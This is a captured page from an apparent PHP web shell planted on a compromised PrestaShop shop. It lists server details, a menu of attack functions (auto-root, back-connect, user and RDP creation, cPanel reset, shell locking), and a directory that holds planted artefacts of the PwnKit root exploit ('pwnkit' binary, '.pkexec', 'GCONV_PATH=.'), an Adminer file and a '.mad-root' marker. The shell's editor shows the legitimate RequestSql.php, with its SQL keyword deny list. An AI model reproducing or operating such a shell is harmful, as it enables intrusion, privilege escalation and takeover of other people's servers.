Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
garmin /
classes /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
Smarty
[ DIR ]
drwx---r-x
assets
[ DIR ]
drwx---r-x
cache
[ DIR ]
drwx---r-x
checkout
[ DIR ]
drwx---r-x
container
[ DIR ]
drwx---r-x
controller
[ DIR ]
drwx---r-x
db
[ DIR ]
drwx---r-x
exception
[ DIR ]
drwx---r-x
form
[ DIR ]
drwx---r-x
helper
[ DIR ]
drwx---r-x
lang
[ DIR ]
drwx---r-x
log
[ DIR ]
drwx---r-x
module
[ DIR ]
drwx---r-x
order
[ DIR ]
drwx---r-x
pdf
[ DIR ]
drwx---r-x
product
[ DIR ]
drwx---r-x
proxy
[ DIR ]
drwx---r-x
range
[ DIR ]
drwx---r-x
shop
[ DIR ]
drwx---r-x
stock
[ DIR ]
drwx---r-x
tax
[ DIR ]
drwx---r-x
tree
[ DIR ]
drwx---r-x
webservice
[ DIR ]
drwx---r-x
.htaccess
170
B
-rw----r--
.mad-root
0
B
-rw-r--r--
Access.php
13.2
KB
-rw----r--
Address.php
20.13
KB
-rw----r--
AddressChecksumCore.php
1.7
KB
-rw----r--
AddressFormat.php
25.62
KB
-rw----r--
Alias.php
5.03
KB
-rw----r--
Attachment.php
7.91
KB
-rw----r--
Attribute.php
13.47
KB
-rw----r--
AttributeGroup.php
13.32
KB
-rw----r--
CMS.php
11.41
KB
-rw----r--
CMSCategory.php
24.09
KB
-rw----r--
CMSRole.php
1.78
KB
-rw----r--
CSV.php
3.04
KB
-rw----r--
Carrier.php
61.57
KB
-rw----r--
Cart.php
212.71
KB
-rw----r--
CartRule.php
88.48
KB
-rw----r--
Category.php
84.77
KB
-rw----r--
Chart.php
4.16
KB
-rw----r--
ChecksumInterface.php
1.13
KB
-rw----r--
Combination.php
14.5
KB
-rw----r--
Configuration.php
26.03
KB
-rw----r--
ConfigurationKPI.php
8.64
KB
-rw----r--
ConfigurationTest.php
11.92
KB
-rw----r--
Connection.php
10.31
KB
-rw----r--
ConnectionsSource.php
5.72
KB
-rw----r--
Contact.php
3.77
KB
-rw----r--
Context.php
13.8
KB
-rw----r--
Cookie.php
16.42
KB
-rw----r--
Country.php
16.12
KB
-rw----r--
Currency.php
35.48
KB
-rw----r--
Curve.php
2.42
KB
-rw----r--
Customer.php
46.67
KB
-rw----r--
CustomerAddress.php
1.26
KB
-rw----r--
CustomerMessage.php
5.71
KB
-rw----r--
CustomerSession.php
2.31
KB
-rw----r--
CustomerThread.php
9.63
KB
-rw----r--
Customization.php
13.35
KB
-rw----r--
CustomizationField.php
2.72
KB
-rw----r--
DateRange.php
2.47
KB
-rw----r--
Delivery.php
3.24
KB
-rw----r--
Dispatcher.php
43.1
KB
-rw----r--
Employee.php
22.1
KB
-rw----r--
EmployeeSession.php
2.32
KB
-rw----r--
Feature.php
11.16
KB
-rw----r--
FeatureValue.php
8.02
KB
-rw----r--
FileUploader.php
3.54
KB
-rw----r--
Gender.php
2.71
KB
-rw----r--
Group.php
14.51
KB
-rw----r--
GroupReduction.php
9.84
KB
-rw----r--
Guest.php
7.9
KB
-rw----r--
Hook.php
42.13
KB
-rw----r--
Image.php
28.51
KB
-rw----r--
ImageManager.php
23.98
KB
-rw----r--
ImageType.php
6.94
KB
-rw----r--
Language.php
57.96
KB
-rw----r--
Link.php
56.55
KB
-rw----r--
LocalizationPack.php
25.19
KB
-rw----r--
Mail.php
31.22
KB
-rw----r--
Manufacturer.php
20.82
KB
-rw----r--
ManufacturerAddress.php
1.28
KB
-rw----r--
Media.php
34.44
KB
-rw----r--
Message.php
6.26
KB
-rw----r--
Meta.php
17.97
KB
-rw----r--
Notification.php
7.42
KB
-rw----r--
ObjectModel.php
75.02
KB
-rw----r--
Pack.php
22.78
KB
-rw----r--
Page.php
4.48
KB
-rw----r--
PaymentFree.php
1.25
KB
-rw----r--
PaymentModule.php
59.53
KB
-rw----r--
PhpEncryption.php
3.39
KB
-rw----r--
PhpEncryptionEngine.php
4.26
KB
-rw----r--
PhpEncryptionLegacyEngine.php
4.77
KB
-rw----r--
PrestaShopAutoload.php
12.25
KB
-rw----r--
PrestaShopBackup.php
12.07
KB
-rw----r--
PrestaShopCollection.php
21.07
KB
-rw----r--
PrestaShopLogger.php
6.5
KB
-rw----r--
Product.php
269.79
KB
-rw----r--
ProductAssembler.php
3.37
KB
-rw----r--
ProductDownload.php
9.77
KB
-rw----r--
ProductPresenterFactory.php
3.6
KB
-rw----r--
ProductSale.php
12.7
KB
-rw----r--
ProductSupplier.php
8.76
KB
-rw----r--
Profile.php
7.56
KB
-rw----r--
QqUploadedFileForm.php
4.93
KB
-rw----r--
QqUploadedFileXhr.php
5.56
KB
-rw----r--
QuickAccess.php
4.65
KB
-rw----r--
Referrer.php
17.45
KB
-rw----r--
RequestSql.php
20.14
KB
-rw----r--
Risk.php
2.36
KB
-rw----r--
Search.php
51.05
KB
-rw----r--
SearchEngine.php
2.79
KB
-rw----r--
SpecificPrice.php
30.68
KB
-rw----r--
SpecificPriceRule.php
13.67
KB
-rw----r--
State.php
7.38
KB
-rw----r--
Store.php
6.25
KB
-rw----r--
Supplier.php
17.66
KB
-rw----r--
SupplierAddress.php
1.27
KB
-rw----r--
Tab.php
21.37
KB
-rw----r--
Tag.php
11.66
KB
-rw----r--
Tools.php
144.64
KB
-rw----r--
Translate.php
13.81
KB
-rw----r--
TranslatedConfiguration.php
4.56
KB
-rw----r--
Upgrader.php
11.54
KB
-rw----r--
Uploader.php
11.41
KB
-rw----r--
Validate.php
34.53
KB
-rw----r--
ValidateConstraintTranslator.p...
2.55
KB
-rw----r--
WarehouseAddress.php
1.27
KB
-rw----r--
Windows.php
1.34
KB
-rw----r--
Zone.php
3.4
KB
-rw----r--
adminer.php
465.43
KB
-rw-r--r--
index.php
1.34
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : RequestSql.php
<?php /** * Copyright since 2007 PrestaShop SA and Contributors * PrestaShop is an International Registered Trademark & Property of PrestaShop SA * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.md. * It is also available through the world-wide-web at this URL: * https://opensource.org/licenses/OSL-3.0 * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@prestashop.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to https://devdocs.prestashop.com/ for more information. * * @author PrestaShop SA and Contributors <contact@prestashop.com> * @copyright Since 2007 PrestaShop SA and Contributors * @license https://opensource.org/licenses/OSL-3.0 Open Software License (OSL 3.0) */ /** * Class RequestSqlCore. */ class RequestSqlCore extends ObjectModel { public $name; public $sql; /** * @see ObjectModel::$definition */ public static $definition = [ 'table' => 'request_sql', 'primary' => 'id_request_sql', 'fields' => [ 'name' => ['type' => self::TYPE_STRING, 'validate' => 'isString', 'required' => true, 'size' => 200], 'sql' => ['type' => self::TYPE_SQL, 'validate' => 'isString', 'required' => true], ], ]; /** @var array : List of params to tested */ public $tested = [ 'required' => ['SELECT', 'FROM'], 'option' => ['WHERE', 'ORDER', 'LIMIT', 'HAVING', 'GROUP', 'UNION'], 'operator' => [ 'AND', '&&', 'BETWEEN', 'AND', 'BINARY', '&', '~', '|', '^', 'CASE', 'WHEN', 'END', 'DIV', '/', '<=>', '=', '>=', '>', 'IS', 'NOT', 'NULL', '<<', '<=', '<', 'LIKE', '-', '%', '!=', '<>', 'REGEXP', '!', '||', 'OR', '+', '>>', 'RLIKE', 'SOUNDS', '*', '-', 'XOR', 'IN', ], 'function' => [ 'AVG', 'SUM', 'COUNT', 'MIN', 'MAX', 'STDDEV', 'STDDEV_SAMP', 'STDDEV_POP', 'VARIANCE', 'VAR_SAMP', 'VAR_POP', 'GROUP_CONCAT', 'BIT_AND', 'BIT_OR', 'BIT_XOR', ], 'unauthorized' => [ 'DELETE', 'ALTER', 'INSERT', 'REPLACE', 'CREATE', 'TRUNCATE', 'OPTIMIZE', 'GRANT', 'REVOKE', 'SHOW', 'HANDLER', 'LOAD', 'ROLLBACK', 'SAVEPOINT', 'UNLOCK', 'INSTALL', 'UNINSTALL', 'ANALZYE', 'BACKUP', 'CHECK', 'CHECKSUM', 'REPAIR', 'RESTORE', 'CACHE', 'DESCRIBE', 'EXPLAIN', 'USE', 'HELP', 'SET', 'DUPLICATE', 'VALUES', 'INTO', 'RENAME', 'CALL', 'PROCEDURE', 'FUNCTION', 'DATABASE', 'SERVER', 'LOGFILE', 'DEFINER', 'RETURNS', 'EVENT', 'TABLESPACE', 'VIEW', 'TRIGGER', 'DATA', 'DO', 'PASSWORD', 'USER', 'PLUGIN', 'FLUSH', 'KILL', 'RESET', 'START', 'STOP', 'PURGE', 'EXECUTE', 'PREPARE', 'DEALLOCATE', 'LOCK', 'USING', 'DROP', 'FOR', 'UPDATE', 'BEGIN', 'BY', 'ALL', 'SHARE', 'MODE', 'TO', 'KEY', 'DISTINCTROW', 'DISTINCT', 'HIGH_PRIORITY', 'LOW_PRIORITY', 'DELAYED', 'IGNORE', 'FORCE', 'STRAIGHT_JOIN', 'SQL_SMALL_RESULT', 'SQL_BIG_RESULT', 'QUICK', 'SQL_BUFFER_RESULT', 'SQL_CACHE', 'SQL_NO_CACHE', 'SQL_CALC_FOUND_ROWS', 'WITH', ], ]; public $attributes = [ 'passwd' => '*******************', 'secure_key' => '*******************', ]; /** @var array : list of errors */ public $error_sql = []; /** * Get list of request SQL. * * @return array|bool */ public static function getRequestSql() { if (!$result = Db::getInstance(_PS_USE_SQL_SLAVE_)->executeS('SELECT * FROM `' . _DB_PREFIX_ . 'request_sql` ORDER BY `id_request_sql`')) { return false; } $requestSql = []; foreach ($result as $row) { $requestSql[] = $row['sql']; } return $requestSql; } /** * Get list of request SQL by id request. * * @param int $id * * @return array */ public static function getRequestSqlById($id) { return Db::getInstance()->executeS('SELECT `sql` FROM `' . _DB_PREFIX_ . 'request_sql` WHERE `id_request_sql` = ' . (int) $id); } /** * Call the parserSQL() method in Tools class * Cut the request in table for check it. * * @param string $sql * * @return array|bool */ public function parsingSql($sql) { return Tools::parserSQL($sql); } /** * Check if the parsing of the SQL request is good or not. * * @param array $tab * @param bool $in * @param string $sql * * @return bool */ public function validateParser($tab, $in, $sql) { if (!$tab) { return false; } elseif (isset($tab['UNION'])) { $union = $tab['UNION']; foreach ($union as $tab) { if (!$this->validateSql($tab, $in, $sql)) { return false; } } return true; } else { return $this->validateSql($tab, $in, $sql); } } /** * Cut the request for check each cutting. * * @param $tab * @param $in * @param $sql * * @return bool */ public function validateSql($tab, $in, $sql) { if (!$this->testedRequired($tab)) { return false; } elseif (!$this->testedUnauthorized($tab)) { return false; } elseif (!$this->checkedFrom($tab['FROM'])) { return false; } elseif (!$this->checkedSelect($tab['SELECT'], $tab['FROM'], $in)) { return false; } elseif (isset($tab['WHERE'])) { if (!$this->checkedWhere($tab['WHERE'], $tab['FROM'], $sql)) { return false; } } elseif (isset($tab['HAVING'])) { if (!$this->checkedHaving($tab['HAVING'], $tab['FROM'])) { return false; } } elseif (isset($tab['ORDER'])) { if (!$this->checkedOrder($tab['ORDER'], $tab['FROM'])) { return false; } } elseif (isset($tab['GROUP'])) { if (!$this->checkedGroupBy($tab['GROUP'], $tab['FROM'])) { return false; } } elseif (isset($tab['LIMIT'])) { if (!$this->checkedLimit($tab['LIMIT'])) { return false; } } if (empty($this->_errors) && !Db::getInstance()->executeS($sql)) { return false; } return true; } /** * Get list of all tables. * * @return array */ public function getTables() { $results = Db::getInstance()->executeS('SHOW TABLES'); foreach ($results as $result) { $key = array_keys($result); $tables[] = $result[$key[0]]; } return $tables; } /** * Get list of all attributes by an table. * * @param $table * * @return array */ public function getAttributesByTable($table) { return Db::getInstance()->executeS('DESCRIBE ' . pSQL($table)); } /** * Cut an join sentence. * * @param array $attrs * @param array $from * * @return array */ public function cutJoin($attrs, $from) { $tab = []; foreach ($attrs as $attr) { if (in_array($attr['expr_type'], ['operator', 'const'])) { continue; } if ($attribut = $this->cutAttribute($attr['base_expr'], $from)) { $tab[] = $attribut; } } return $tab; } /** * Cut an attribute with or without the alias. * * @param $attr * @param $from * * @return array|bool */ public function cutAttribute($attr, $from) { $matches = []; if (preg_match('/((`(\()?([a-z0-9_])+`(\))?)|((\()?([a-z0-9_])+(\))?))\.((`(\()?([a-z0-9_])+`(\))?)|((\()?([a-z0-9_])+(\))?))$/i', $attr, $matches, PREG_OFFSET_CAPTURE)) { $tab = explode('.', str_replace(['`', '(', ')'], '', $matches[0][0])); if ($table = $this->returnNameTable($tab[0], $from)) { return [ 'table' => $table, 'alias' => $tab[0], 'attribut' => $tab[1], 'string' => $attr, ]; } } elseif (preg_match('/((`(\()?([a-z0-9_])+`(\))?)|((\()?([a-z0-9_])+(\))?))$/i', $attr, $matches, PREG_OFFSET_CAPTURE)) { $attribut = str_replace(['`', '(', ')'], '', $matches[0][0]); if ($table = $this->returnNameTable(false, $from, $attr)) { return [ 'table' => $table, 'attribut' => $attribut, 'string' => $attr, ]; } } return false; } /** * Get name of table by alias. * * @param bool $alias * @param $tables * * @return array|bool */ public function returnNameTable($alias, $tables, $attr = null) { if ($alias) { foreach ($tables as $table) { if (!isset($table['alias']) || !isset($table['table'])) { continue; } if ($table['alias']['no_quotes'] == $alias || $table['alias']['no_quotes']['parts'][0] == $alias) { return [$table['table']]; } } } elseif (count($tables) > 1) { if ($attr !== null) { $tab = []; foreach ($tables as $table) { if ($this->attributExistInTable($attr, $table['table'])) { $tab = $table['table']; } } if (count($tab) == 1) { return $tab; } } $this->error_sql['returnNameTable'] = false; return false; } else { $tab = []; foreach ($tables as $table) { $tab[] = $table['table']; } return $tab; } } /** * Check if an attributes exists in a table. * * @param string $attr * @param array $table * * @return bool */ public function attributExistInTable($attr, $table) { if (!$attr) { return true; } if (is_array($table) && (count($table) == 1)) { $table = $table[0]; } $attributs = $this->getAttributesByTable($table); foreach ($attributs as $attribut) { if ($attribut['Field'] == trim($attr, ' `')) { return true; } } return false; } /** * Check if all required sentence existing. * * @param $tab * * @return bool */ public function testedRequired($tab) { foreach ($this->tested['required'] as $key) { if (!array_key_exists($key, $tab)) { $this->error_sql['testedRequired'] = $key; return false; } } return true; } /** * Check if an unauthorized existing in an array. * * @param string $tab * * @return bool */ public function testedUnauthorized($tab) { foreach ($this->tested['unauthorized'] as $key) { if (array_key_exists($key, $tab)) { $this->error_sql['testedUnauthorized'] = $key; return false; } } return true; } /** * Check a "FROM" sentence. * * @param array $from * * @return bool */ public function checkedFrom($from) { $nb = count($from); for ($i = 0; $i < $nb; ++$i) { $table = $from[$i]; if (isset($table['table']) && !in_array(str_replace('`', '', $table['table']), $this->getTables())) { $this->error_sql['checkedFrom']['table'] = $table['table']; return false; } if ($table['ref_type'] == 'ON' && (trim($table['join_type']) == 'LEFT' || trim($table['join_type']) == 'JOIN')) { $attrs = $this->cutJoin($table['ref_clause'], $from); if (is_array($attrs)) { foreach ($attrs as $attr) { if (!$this->attributExistInTable($attr['attribut'], $attr['table'])) { $this->error_sql['checkedFrom']['attribut'] = [$attr['attribut'], implode(', ', $attr['table'])]; return false; } } } else { if (isset($this->error_sql['returnNameTable'])) { $this->error_sql['checkedFrom'] = $this->error_sql['returnNameTable']; return false; } else { $this->error_sql['checkedFrom'] = false; return false; } } } } return true; } /** * Check a "SELECT" sentence. * * @param string $select * @param string $from * @param bool $in * * @return bool */ public function checkedSelect($select, $from, $in = false) { $nb = count($select); for ($i = 0; $i < $nb; ++$i) { $attribut = $select[$i]; if ($attribut['base_expr'] != '*' && !preg_match('/\.*$/', $attribut['base_expr'])) { if ($attribut['expr_type'] == 'colref') { if ($attr = $this->cutAttribute(trim($attribut['base_expr']), $from)) { if (!$this->attributExistInTable($attr['attribut'], $attr['table'])) { $this->error_sql['checkedSelect']['attribut'] = [$attr['attribut'], implode(', ', $attr['table'])]; return false; } } else { if (isset($this->error_sql['returnNameTable'])) { $this->error_sql['checkedSelect'] = $this->error_sql['returnNameTable']; return false; } else { $this->error_sql['checkedSelect'] = false; return false; } } } } elseif ($in) { $this->error_sql['checkedSelect']['*'] = false; return false; } } return true; } /** * Check a "WHERE" sentence. * * @param string $where * @param string $from * @param string $sql * * @return bool */ public function checkedWhere($where, $from, $sql) { $nb = count($where); for ($i = 0; $i < $nb; ++$i) { $attribut = $where[$i]; if ($attribut['expr_type'] == 'colref' || $attribut['expr_type'] == 'reserved') { if ($attr = $this->cutAttribute(trim($attribut['base_expr']), $from)) { if (!$this->attributExistInTable($attr['attribut'], $attr['table'])) { $this->error_sql['checkedWhere']['attribut'] = [$attr['attribut'], implode(', ', $attr['table'])]; return false; } } else { if (isset($this->error_sql['returnNameTable'])) { $this->error_sql['checkedWhere'] = $this->error_sql['returnNameTable']; return false; } else { $this->error_sql['checkedWhere'] = false; return false; } } } elseif ($attribut['expr_type'] == 'operator') { if (!in_array(strtoupper($attribut['base_expr']), $this->tested['operator'])) { $this->error_sql['checkedWhere']['operator'] = [$attribut['base_expr']]; return false; } } elseif ($attribut['expr_type'] == 'subquery') { $tab = $attribut['sub_tree']; return $this->validateParser($tab, true, $sql); } } return true; } /** * Check a "HAVING" sentence. * * @param string $having * @param string $from * * @return bool */ public function checkedHaving($having, $from) { $nb = count($having); for ($i = 0; $i < $nb; ++$i) { $attribut = $having[$i]; if ($attribut['expr_type'] == 'colref') { if ($attr = $this->cutAttribute(trim($attribut['base_expr']), $from)) { if (!$this->attributExistInTable($attr['attribut'], $attr['table'])) { $this->error_sql['checkedHaving']['attribut'] = [$attr['attribut'], implode(', ', $attr['table'])]; return false; } } else { if (isset($this->error_sql['returnNameTable'])) { $this->error_sql['checkedHaving'] = $this->error_sql['returnNameTable']; return false; } else { $this->error_sql['checkedHaving'] = false; return false; } } } if ($attribut['expr_type'] == 'operator') { if (!in_array(strtoupper($attribut['base_expr']), $this->tested['operator'])) { $this->error_sql['checkedHaving']['operator'] = [$attribut['base_expr']]; return false; } } } return true; } /** * Check a "ORDER" sentence. * * @param string $order * @param string $from * * @return bool */ public function checkedOrder($order, $from) { $order = $order[0]; if (array_key_exists('expression', $order) && $order['type'] == 'expression') { if ($attr = $this->cutAttribute(trim($order['base_expr']), $from)) { if (!$this->attributExistInTable($attr['attribut'], $attr['table'])) { $this->error_sql['checkedOrder']['attribut'] = [$attr['attribut'], implode(', ', $attr['table'])]; return false; } } else { if (isset($this->error_sql['returnNameTable'])) { $this->error_sql['checkedOrder'] = $this->error_sql['returnNameTable']; return false; } else { $this->error_sql['checkedOrder'] = false; return false; } } } return true; } /** * Check a "GROUP BY" sentence. * * @param array $group * @param array $from * * @return bool */ public function checkedGroupBy($group, $from) { $group = $group[0]; if ($group['expr_type'] == 'colref') { if ($attr = $this->cutAttribute(trim($group['base_expr']), $from)) { if (!$this->attributExistInTable($attr['attribut'], $attr['table'])) { $this->error_sql['checkedGroupBy']['attribut'] = [$attr['attribut'], implode(', ', $attr['table'])]; return false; } } else { if (isset($this->error_sql['returnNameTable'])) { $this->error_sql['checkedGroupBy'] = $this->error_sql['returnNameTable']; return false; } else { $this->error_sql['checkedGroupBy'] = false; return false; } } } return true; } /** * Check a "LIMIT" sentence. * * @param string $limit * * @return bool */ public function checkedLimit($limit) { if (!preg_match('#^[0-9]+$#', trim($limit['start'])) || !preg_match('#^[0-9]+$#', trim($limit['end']))) { $this->error_sql['checkedLimit'] = false; return false; } return true; } }
Close
